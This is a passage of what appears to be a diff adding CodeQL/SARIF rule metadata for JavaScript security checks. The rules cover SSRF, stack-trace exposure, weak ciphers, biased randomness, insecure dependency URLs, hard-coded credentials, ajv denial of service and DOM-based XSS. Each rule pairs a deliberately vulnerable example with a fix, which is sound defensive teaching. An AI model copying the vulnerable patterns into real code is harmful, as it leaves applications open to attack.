http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a network request with user-controlled data in the URL allows for request forgery attacks.", + "id" : "js/request-forgery", + "kind" : "path-problem", + "name" : "Server-side request forgery", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/stack-trace-exposure", + "name" : "js/stack-trace-exposure", + "shortDescription" : { + "text" : "Information exposure through a stack trace" + }, + "fullDescription" : { + "text" : "Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n", + "markdown" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-209", "external/cwe/cwe-497" ], + "description" : "Propagating stack trace information to an external user can\n unintentionally reveal implementation details that are useful\n to an attacker for developing a subsequent exploit.", + "id" : "js/stack-trace-exposure", + "kind" : "path-problem", + "name" : "Information exposure through a stack trace", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "5.4" + } + }, { + "id" : "js/weak-cryptographic-algorithm", + "name" : "js/weak-cryptographic-algorithm", + "shortDescription" : { + "text" : "Use of a broken or weak cryptographic algorithm" + }, + "fullDescription" : { + "text" : "Using broken or weak cryptographic algorithms can compromise security." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n", + "markdown" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327", "external/cwe/cwe-328" ], + "description" : "Using broken or weak cryptographic algorithms can compromise security.", + "id" : "js/weak-cryptographic-algorithm", + "kind" : "path-problem", + "name" : "Use of a broken or weak cryptographic algorithm", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/biased-cryptographic-random", + "name" : "js/biased-cryptographic-random", + "shortDescription" : { + "text" : "Creating biased random numbers from a cryptographically secure source." + }, + "fullDescription" : { + "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", + "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327" ], + "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", + "id" : "js/biased-cryptographic-random", + "kind" : "problem", + "name" : "Creating biased random numbers from a cryptographically secure source.", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/insecure-dependency", + "name" : "js/insecure-dependency", + "shortDescription" : { + "text" : "Dependency download using unencrypted communication channel" + }, + "fullDescription" : { + "text" : "Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-300", "external/cwe/cwe-319", "external/cwe/cwe-494", "external/cwe/cwe-829" ], + "description" : "Using unencrypted protocols to fetch dependencies can leave an application\n open to man-in-the-middle attacks.", + "id" : "js/insecure-dependency", + "kind" : "problem", + "name" : "Dependency download using unencrypted communication channel", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/hardcoded-credentials", + "name" : "js/hardcoded-credentials", + "shortDescription" : { + "text" : "Hard-coded credentials" + }, + "fullDescription" : { + "text" : "Hard-coding credentials in source code may enable an attacker to gain unauthorized access." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", + "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], + "description" : "Hard-coding credentials in source code may enable an attacker\n to gain unauthorized access.", + "id" : "js/hardcoded-credentials", + "kind" : "path-problem", + "name" : "Hard-coded credentials", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/resource-exhaustion-from-deep-object-traversal", + "name" : "js/resource-exhaustion-from-deep-object-traversal", + "shortDescription" : { + "text" : "Resources exhaustion from deep object traversal" + }, + "fullDescription" : { + "text" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400" ], + "description" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service.", + "id" : "js/resource-exhaustion-from-deep-object-traversal", + "kind" : "path-problem", + "name" : "Resources exhaustion from deep object traversal", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/xss-through-dom", + "name" : "js/xss-through-dom", + "shortDescription" : { + "text" : "DOM text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* 